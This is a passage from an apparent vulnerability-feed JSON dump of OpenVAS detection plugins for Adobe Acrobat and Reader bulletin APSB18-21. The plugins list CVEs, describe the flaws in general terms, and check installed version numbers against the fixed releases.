\"CVE-2018-5056\", \"CVE-2018-5060\",\n \"CVE-2018-5061\", \"CVE-2018-5062\", \"CVE-2018-5063\", \"CVE-2018-5066\",\n \"CVE-2018-5068\", \"CVE-2018-12757\", \"CVE-2018-12761\", \"CVE-2018-12762\",\n \"CVE-2018-12763\", \"CVE-2018-12764\", \"CVE-2018-12765\", \"CVE-2018-12766\",\n \"CVE-2018-12767\", \"CVE-2018-12768\", \"CVE-2018-12774\", \"CVE-2018-12777\",\n \"CVE-2018-12779\", \"CVE-2018-12780\", \"CVE-2018-12781\", \"CVE-2018-12786\",\n \"CVE-2018-12789\", \"CVE-2018-12790\", \"CVE-2018-12795\", \"CVE-2018-5057\",\n \"CVE-2018-12793\", \"CVE-2018-12794\", \"CVE-2018-5012\", \"CVE-2018-5030\",\n \"CVE-2018-5034\", \"CVE-2018-5037\", \"CVE-2018-5043\", \"CVE-2018-12784\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-12 13:11:59 +0530 (Thu, 12 Jul 2018)\");\n script_name(\"Adobe Acrobat Reader 2017 Multiple Vulnerabilities-apsb18-21 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat Reader\n 2017 and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A double free error.\n\n - Multiple heap overflow errors.\n\n - Multiple use-after-free errors.\n\n - Multiple out-of-bounds write errors.\n\n - A security bypass error.\n\n - Multiple out-of-bounds read errors.\n\n - Multiple type confusion errors.\n\n - An untrusted pointer dereference error.\n\n - Multiple buffer errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to gain escalated privileges, disclose sensitive information,\n execute arbitrary code on affected system and take control of the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Reader 2017.011.30080 and earlier\n versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat Reader 2017 version\n 2017.011.30096 or later. For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-21.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n##2017.011.30096 == 17.011.30096\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30095\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2017.011.30096\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-26T14:35:23", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-21.html", "https://helpx.adobe.com"], "pluginID": "1361412562310813665", "description": "This host is installed with Adobe Acrobat DC\n (Continuous Track) and is prone to multiple vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-12T00:00:00", "title": "Adobe Acrobat DC (Continuous Track) Multiple Vulnerabilities-apsb18-21 (Windows)", "type": "openvas", "enchantments": {"score": {"modified": "2018-10-26T14:35:23", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5025", "CVE-2018-12803", "CVE-2018-12776", "CVE-2018-5011", "CVE-2018-5067", "CVE-2018-12784", "CVE-2018-5061", "CVE-2018-5031", "CVE-2018-5047", "CVE-2018-5020", "CVE-2018-12754", "CVE-2018-5033", "CVE-2018-12757", "CVE-2018-5065", "CVE-2018-5054", "CVE-2018-12802", "CVE-2018-12761", "CVE-2018-5010", "CVE-2018-5036", "CVE-2018-5024", "CVE-2018-5048", "CVE-2018-5018", "CVE-2018-5034", "CVE-2018-5028", "CVE-2018-12779", "CVE-2018-12783", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-12781", "CVE-2018-5044", "CVE-2018-5014", "CVE-2018-12760", "CVE-2018-12798", "CVE-2018-5043", "CVE-2018-5050", "CVE-2018-5070", "CVE-2018-5058", "CVE-2018-5063", "CVE-2018-5066", "CVE-2018-5042", "CVE-2018-12787", "CVE-2018-5019", "CVE-2018-5046", "CVE-2018-5027", "CVE-2018-5041", "CVE-2018-5068", "CVE-2018-5045", "CVE-2018-12777", "CVE-2018-5069", "CVE-2018-12794", "CVE-2018-5055", "CVE-2018-5021", "CVE-2018-5062", "CVE-2018-12765", "CVE-2018-5009", "CVE-2018-5039", "CVE-2018-12774", "CVE-2018-12790", "CVE-2018-12782", "CVE-2018-12771", "CVE-2018-12793", "CVE-2018-12762", "CVE-2018-12763", "CVE-2018-5035", "CVE-2018-5056", "CVE-2018-5032", "CVE-2018-12780", "CVE-2018-12788", "CVE-2018-5015", "CVE-2018-5017", "CVE-2018-12766", "CVE-2018-5016", "CVE-2018-12785", "CVE-2018-12796", "CVE-2018-12764", "CVE-2018-12770", "CVE-2018-12756", "CVE-2018-12792", "CVE-2018-5030", "CVE-2018-5038", "CVE-2018-12797", "CVE-2018-5026", "CVE-2018-5023", "CVE-2018-5049", "CVE-2018-12768", "CVE-2018-5040", "CVE-2018-12755", "CVE-2018-5029", "CVE-2018-12789", "CVE-2018-5057", "CVE-2018-12767", "CVE-2018-12791", "CVE-2018-5064", "CVE-2018-5012", "CVE-2018-5022", "CVE-2018-12758", "CVE-2018-12773", "CVE-2018-5060", "CVE-2018-12786", "CVE-2018-12772", "CVE-2018-5059", "CVE-2018-12795", "CVE-2018-5037", "CVE-2018-5053"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310813665", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813665", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_dc_cont_apsb18-21_win.nasl 12116 2018-10-26 10:01:35Z mmartin $\n#\n# Adobe Acrobat DC (Continuous Track) Multiple Vulnerabilities-apsb18-21 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_dc_continuous\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813665\");\n script_version(\"$Revision: 12116 $\");\n script_cve_id(\"CVE-2018-12782\", \"CVE-2018-5015\", \"CVE-2018-5028\", \"CVE-2018-5032\",\n \"CVE-2018-5036\", \"CVE-2018-5038\", \"CVE-2018-5040\", \"CVE-2018-5041\",\n \"CVE-2018-5045\", \"CVE-2018-5052\", \"CVE-2018-5058\", \"CVE-2018-5067\",\n \"CVE-2018-12785\", \"CVE-2018-12788\", \"CVE-2018-12798\", \"CVE-2018-5009\",\n \"CVE-2018-5011\", \"CVE-2018-5065\", \"CVE-2018-12756\", \"CVE-2018-12770\",\n \"CVE-2018-12772\", \"CVE-2018-12773\", \"CVE-2018-12776\", \"CVE-2018-12783\",\n \"CVE-2018-12791\", \"CVE-2018-12792\", \"CVE-2018-12796\", \"CVE-2018-12797\",\n \"CVE-2018-5020\", \"CVE-2018-5021\", \"CVE-2018-5042\", \"CVE-2018-5059\",\n \"CVE-2018-5064\", \"CVE-2018-5069\", \"CVE-2018-5070\", \"CVE-2018-12754\",\n \"CVE-2018-12755\", \"CVE-2018-12758\", \"CVE-2018-12760\", \"CVE-2018-12771\",\n \"CVE-2018-12787\", \"CVE-2018-12802\", \"CVE-2018-5010\", \"CVE-2018-12803\",\n \"CVE-2018-5014\", \"CVE-2018-5016\", \"CVE-2018-5017\", \"CVE-2018-5018\",\n \"CVE-2018-5019\", \"CVE-2018-5022\", \"CVE-2018-5023\", \"CVE-2018-5024\",\n \"CVE-2018-5025\", \"CVE-2018-5026\", \"CVE-2018-5027\", \"CVE-2018-5029\",\n \"CVE-2018-5031\", \"CVE-2018-5033\", \"CVE-2018-5035\", \"CVE-2018-5039\",\n \"CVE-2018-5044\", \"CVE-2018-5046\", \"CVE-2018-5047\", \"CVE-2018-5048\",\n \"CVE-2018-5049\", \"CVE-2018-5050\", \"CVE-2018-5051\", \"CVE-2018-5053\",\n \"CVE-2018-5054\", \"CVE-2018-5055\", \"CVE-2018-5056\", \"CVE-2018-5060\",\n \"CVE-2018-5061\", \"CVE-2018-5062\", \"CVE-2018-5063\", \"CVE-2018-5066\",\n \"CVE-2018-5068\", \"CVE-2018-12757\", \"CVE-2018-12761\", \"CVE-2018-12762\",\n \"CVE-2018-12763\", \"CVE-2018-12764\", \"CVE-2018-12765\", \"CVE-2018-12766\",\n \"CVE-2018-12767\", \"CVE-2018-12768\", \"CVE-2018-12774\", \"CVE-2018-12777\",\n \"CVE-2018-12779\", \"CVE-2018-12780\", \"CVE-2018-12781\", \"CVE-2018-12786\",\n \"CVE-2018-12789\", \"CVE-2018-12790\", \"CVE-2018-12795\", \"CVE-2018-5057\",\n \"CVE-2018-12793\", \"CVE-2018-12794\", \"CVE-2018-5012\", \"CVE-2018-5030\",\n \"CVE-2018-5034\", \"CVE-2018-5037\", \"CVE-2018-5043\", \"CVE-2018-12784\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 12:01:35 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-12 13:11:59 +0530 (Thu, 12 Jul 2018)\");\n script_name(\"Adobe Acrobat DC (Continuous Track) Multiple Vulnerabilities-apsb18-21 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat DC\n (Continuous Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A double free error.\n\n - Multiple heap overflow errors.\n\n - Multiple use-after-free errors.\n\n - Multiple out-of-bounds write errors.\n\n - A security bypass error.\n\n - Multiple out-of-bounds read errors.\n\n - Multiple type confusion errors.\n\n - An untrusted pointer dereference error.\n\n - MUltiple buffer errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to gain escalated privileges, disclose sensitive information,\n execute arbitrary code on affected system and take control of the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat DC (Continuous Track) 2018.011.20040\n and earlier versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat DC Continuous\n version 2018.011.20055 or later.\n For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-21.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_dc_cont_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/AcrobatDC/Continuous/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n##2018.011.20055 == 18.011.20055\nif(version_is_less(version:vers, test_version:\"18.011.20055\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2018.011.20055\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-26T14:35:11", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-21.html", "https://helpx.adobe.com"], "pluginID": "1361412562310813667", "description": "This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-12T00:00:00", "title": "Adobe Acrobat DC (Classic Track) Multiple Vulnerabilities-apsb18-21 (Windows)", "type": "openvas", "enchantments": {"score": {"modified": "2018-10-26T14:35:11", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5025", "CVE-2018-12803", "CVE-2018-12776", "CVE-2018-5011", "CVE-2018-5067", "CVE-2018-12784", "CVE-2018-5061", "CVE-2018-5031", "CVE-2018-5047", "CVE-2018-5020", "CVE-2018-12754", "CVE-2018-5033", "CVE-2018-12757", "CVE-2018-5065", "CVE-2018-5054", "CVE-2018-12802", "CVE-2018-12761", "CVE-2018-5010", "CVE-2018-5036", "CVE-2018-5024", "CVE-2018-5048", "CVE-2018-5018", "CVE-2018-5034", "CVE-2018-5028", "CVE-2018-12779", "CVE-2018-12783", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-12781", "CVE-2018-5044", "CVE-2018-5014", "CVE-2018-12760", "CVE-2018-12798", "CVE-2018-5043", "CVE-2018-5050", "CVE-2018-5070", "CVE-2018-5058", "CVE-2018-5063", "CVE-2018-5066", "CVE-2018-5042", "CVE-2018-12787", "CVE-2018-5019", "CVE-2018-5046", "CVE-2018-5027", "CVE-2018-5041", "CVE-2018-5068", "CVE-2018-5045", "CVE-2018-12777", "CVE-2018-5069", "CVE-2018-12794", "CVE-2018-5055", "CVE-2018-5021", "CVE-2018-5062", "CVE-2018-12765", "CVE-2018-5009", "CVE-2018-5039", "CVE-2018-12774", "CVE-2018-12790", "CVE-2018-12782", "CVE-2018-12771", "CVE-2018-12793", "CVE-2018-12762", "CVE-2018-12763", "CVE-2018-5035", "CVE-2018-5056", "CVE-2018-5032", "CVE-2018-12780", "CVE-2018-12788", "CVE-2018-5015", "CVE-2018-5017", "CVE-2018-12766", "CVE-2018-5016", "CVE-2018-12785", "CVE-2018-12796", "CVE-2018-12764", "CVE-2018-12770", "CVE-2018-12756", "CVE-2018-12792", "CVE-2018-5030", "CVE-2018-5038", "CVE-2018-12797", "CVE-2018-5026", "CVE-2018-5023", "CVE-2018-5049", "CVE-2018-12768", "CVE-2018-5040", "CVE-2018-12755", "CVE-2018-5029", "CVE-2018-12789", "CVE-2018-5057", "CVE-2018-12767", "CVE-2018-12791", "CVE-2018-5064", "CVE-2018-5012", "CVE-2018-5022", "CVE-2018-12758", "CVE-2018-12773", "CVE-2018-5060", "CVE-2018-12786", "CVE-2018-12772", "CVE-2018-5059", "CVE-2018-12795", "CVE-2018-5037", "CVE-2018-5053"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310813667", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813667", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_dc_classic_apsb18-21_win.nasl 12116 2018-10-26 10:01:35Z mmartin $\n#\n# Adobe Acrobat DC (Classic Track) Multiple Vulnerabilities-apsb18-21 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813667\");\n script_version(\"$Revision: 12116 $\");\n script_cve_id(\"CVE-2018-12782\", \"CVE-2018-5015\", \"CVE-2018-5028\", \"CVE-2018-5032\",\n \"CVE-2018-5036\", \"CVE-2018-5038\", \"CVE-2018-5040\", \"CVE-2018-5041\",\n \"CVE-2018-5045\", \"CVE-2018-5052\", \"CVE-2018-5058\", \"CVE-2018-5067\",\n \"CVE-2018-12785\", \"CVE-2018-12788\", \"CVE-2018-12798\", \"CVE-2018-5009\",\n \"CVE-2018-5011\", \"CVE-2018-5065\", \"CVE-2018-12756\", \"CVE-2018-12770\",\n \"CVE-2018-12772\", \"CVE-2018-12773\", \"CVE-2018-12776\", \"CVE-2018-12783\",\n \"CVE-2018-12791\", \"CVE-2018-12792\", \"CVE-2018-12796\", \"CVE-2018-12797\",\n \"CVE-2018-5020\", \"CVE-2018-5021\", \"CVE-2018-5042\", \"CVE-2018-5059\",\n \"CVE-2018-5064\", \"CVE-2018-5069\", \"CVE-2018-5070\", \"CVE-2018-12754\",\n \"CVE-2018-12755\", \"CVE-2018-12758\", \"CVE-2018-12760\", \"CVE-2018-12771\",\n \"CVE-2018-12787\", \"CVE-2018-12802\", \"CVE-2018-5010\", \"CVE-2018-12803\",\n \"CVE-2018-5014\", \"CVE-2018-5016\", \"CVE-2018-5017\", \"CVE-2018-5018\",\n \"CVE-2018-5019\", \"CVE-2018-5022\", \"CVE-2018-5023\", \"CVE-2018-5024\",\n \"CVE-2018-5025\", \"CVE-2018-5026\", \"CVE-2018-5027\", \"CVE-2018-5029\",\n \"CVE-2018-5031\", \"CVE-2018-5033\", \"CVE-2018-5035\", \"CVE-2018-5039\",\n \"CVE-2018-5044\", \"CVE-2018-5046\", \"CVE-2018-5047\", \"CVE-2018-5048\",\n \"CVE-2018-5049\", \"CVE-2018-5050\", \"CVE-2018-5051\", \"CVE-2018-5053\",\n \"CVE-2018-5054\", \"CVE-2018-5055\", \"CVE-2018-5056\", \"CVE-2018-5060\",\n \"CVE-2018-5061\", \"CVE-2018-5062\", \"CVE-2018-5063\", \"CVE-2018-5066\",\n \"CVE-2018-5068\", \"CVE-2018-12757\", \"CVE-2018-12761\", \"CVE-2018-12762\",\n \"CVE-2018-12763\", \"CVE-2018-12764\", \"CVE-2018-12765\", \"CVE-2018-12766\",\n \"CVE-2018-12767\", \"CVE-2018-12768\", \"CVE-2018-12774\", \"CVE-2018-12777\",\n \"CVE-2018-12779\", \"CVE-2018-12780\", \"CVE-2018-12781\", \"CVE-2018-12786\",\n \"CVE-2018-12789\", \"CVE-2018-12790\", \"CVE-2018-12795\", \"CVE-2018-5057\",\n \"CVE-2018-12793\", \"CVE-2018-12794\", \"CVE-2018-5012\", \"CVE-2018-5030\",\n \"CVE-2018-5034\", \"CVE-2018-5037\", \"CVE-2018-5043\", \"CVE-2018-12784\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 12:01:35 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-12 13:11:59 +0530 (Thu, 12 Jul 2018)\");\n script_name(\"Adobe Acrobat DC (Classic Track) Multiple Vulnerabilities-apsb18-21 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A double free error.\n\n - Multiple heap overflow errors.\n\n - Multiple use-after-free errors.\n\n - Multiple out-of-bounds write errors.\n\n - A security bypass error.\n\n - Multiple out-of-bounds read errors.\n\n - Multiple type confusion errors.\n\n - An untrusted pointer dereference error.\n\n - MUltiple buffer errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to gain escalated privileges, disclose sensitive information,\n execute arbitrary code on affected system and take control of the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat DC (Classic Track)\n 2015.006.30418 and earlier versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat DC (Classic Track)\n version 2015.006.30434 or later.\n For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-21.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_dc_classic_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/AcrobatDC/Classic/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n##2015.006.30434 == 15.006.30434\nif(version_is_less(version:vers, test_version:\"15.006.30434\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2015.006.30434\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-29T12:34:51", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-21.html", "https://helpx.adobe.com"], "pluginID": "1361412562310813661", "description": "This host is installed with Adobe Acrobat Reader\n DC (Continuous Track) and is prone to multiple vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-12T00:00:00", "title": "Adobe Acrobat Reader DC (Continuous Track) Multiple Vulnerabilities-apsb18-21 (Mac OS X)", "type": "openvas", "enchantments": {"score": {"modified": "2018-10-29T12:34:51", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5025", "CVE-2018-12803", "CVE-2018-12776", "CVE-2018-5011", "CVE-2018-5067", "CVE-2018-12784", "CVE-2018-5061", "CVE-2018-5031", "CVE-2018-5047", "CVE-2018-5020", "CVE-2018-12754", "CVE-2018-5033", "CVE-2018-12757", "CVE-2018-5065", "CVE-2018-5054", "CVE-2018-12802", "CVE-2018-12761", "CVE-2018-5010", "CVE-2018-5036", "CVE-2018-5024", "CVE-2018-5048", "CVE-2018-5018", "CVE-2018-5034", "CVE-2018-5028", "CVE-2018-12779", "CVE-2018-12783", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-12781", "CVE-2018-5044", "CVE-2018-5014", "CVE-2018-12760", "CVE-2018-12798", "CVE-2018-5043", "CVE-2018-5050", "CVE-2018-5070", "CVE-2018-5058", "CVE-2018-5063", "CVE-2018-5066", "CVE-2018-5042", "CVE-2018-12787", "CVE-2018-5019", "CVE-2018-5046", "CVE-2018-5027", "CVE-2018-5041", "CVE-2018-5068", "CVE-2018-5045", "CVE-2018-12777", "CVE-2018-5069", "CVE-2018-12794", "CVE-2018-5055", "CVE-2018-5021", "CVE-2018-5062", "CVE-2018-12765", "CVE-2018-5009", "CVE-2018-5039", "CVE-2018-12774", "CVE-2018-12790", "CVE-2018-12782", "CVE-2018-12771", "CVE-2018-12793", "CVE-2018-12762", "CVE-2018-12763", "CVE-2018-5035", "CVE-2018-5056", "CVE-2018-5032", "CVE-2018-12780", "CVE-2018-12788", "CVE-2018-5015", "CVE-2018-5017", "CVE-2018-12766", "CVE-2018-5016", "CVE-2018-12785", "CVE-2018-12796", "CVE-2018-12764", "CVE-2018-12770", "CVE-2018-12756", "CVE-2018-12792", "CVE-2018-5030", "CVE-2018-5038", "CVE-2018-12797", "CVE-2018-5026", "CVE-2018-5023", "CVE-2018-5049", "CVE-2018-12768", "CVE-2018-5040", "CVE-2018-12755", "CVE-2018-5029", "CVE-2018-12789", "CVE-2018-5057", "CVE-2018-12767", "CVE-2018-12791", "CVE-2018-5064", "CVE-2018-5012", "CVE-2018-5022", "CVE-2018-12758", "CVE-2018-12773", "CVE-2018-5060", "CVE-2018-12786", "CVE-2018-12772", "CVE-2018-5059", "CVE-2018-12795", "CVE-2018-5037", "CVE-2018-5053"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310813661", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813661", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_reader_dc_cont_apsb18-21_macosx.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Adobe Acrobat Reader DC (Continuous Track) Multiple Vulnerabilities-apsb18-21 (Mac OS X)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader_dc_continuous\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813661\");\n script_version(\"$Revision: 12120 $\");\n script_cve_id(\"CVE-2018-12782\", \"CVE-2018-5015\", \"CVE-2018-5028\", \"CVE-2018-5032\",\n \"CVE-2018-5036\", \"CVE-2018-5038\", \"CVE-2018-5040\", \"CVE-2018-5041\",\n \"CVE-2018-5045\", \"CVE-2018-5052\", \"CVE-2018-5058\", \"CVE-2018-5067\",\n \"CVE-2018-12785\", \"CVE-2018-12788\", \"CVE-2018-12798\", \"CVE-2018-5009\",\n \"CVE-2018-5011\", \"CVE-2018-5065\", \"CVE-2018-12756\", \"CVE-2018-12770\",\n \"CVE-2018-12772\", \"CVE-2018-12773\", \"CVE-2018-12776\", \"CVE-2018-12783\",\n \"CVE-2018-12791\", \"CVE-2018-12792\", \"CVE-2018-12796\", \"CVE-2018-12797\",\n \"CVE-2018-5020\", \"CVE-2018-5021\", \"CVE-2018-5042\", \"CVE-2018-5059\",\n \"CVE-2018-5064\", \"CVE-2018-5069\", \"CVE-2018-5070\", \"CVE-2018-12754\",\n \"CVE-2018-12755\", \"CVE-2018-12758\", \"CVE-2018-12760\", \"CVE-2018-12771\",\n \"CVE-2018-12787\", \"CVE-2018-12802\", \"CVE-2018-5010\", \"CVE-2018-12803\",\n \"CVE-2018-5014\", \"CVE-2018-5016\", \"CVE-2018-5017\", \"CVE-2018-5018\",\n \"CVE-2018-5019\", \"CVE-2018-5022\", \"CVE-2018-5023\", \"CVE-2018-5024\",\n \"CVE-2018-5025\", \"CVE-2018-5026\", \"CVE-2018-5027\", \"CVE-2018-5029\",\n \"CVE-2018-5031\", \"CVE-2018-5033\", \"CVE-2018-5035\", \"CVE-2018-5039\",\n \"CVE-2018-5044\", \"CVE-2018-5046\", \"CVE-2018-5047\", \"CVE-2018-5048\",\n \"CVE-2018-5049\", \"CVE-2018-5050\", \"CVE-2018-5051\", \"CVE-2018-5053\",\n \"CVE-2018-5054\", \"CVE-2018-5055\", \"CVE-2018-5056\", \"CVE-2018-5060\",\n \"CVE-2018-5061\", \"CVE-2018-5062\", \"CVE-2018-5063\", \"CVE-2018-5066\",\n \"CVE-2018-5068\", \"CVE-2018-12757\", \"CVE-2018-12761\", \"CVE-2018-12762\",\n \"CVE-2018-12763\", \"CVE-2018-12764\", \"CVE-2018-12765\", \"CVE-2018-12766\",\n \"CVE-2018-12767\", \"CVE-2018-12768\", \"CVE-2018-12774\", \"CVE-2018-12777\",\n \"CVE-2018-12779\", \"CVE-2018-12780\", \"CVE-2018-12781\", \"CVE-2018-12786\",\n \"CVE-2018-12789\", \"CVE-2018-12790\", \"CVE-2018-12795\", \"CVE-2018-5057\",\n \"CVE-2018-12793\", 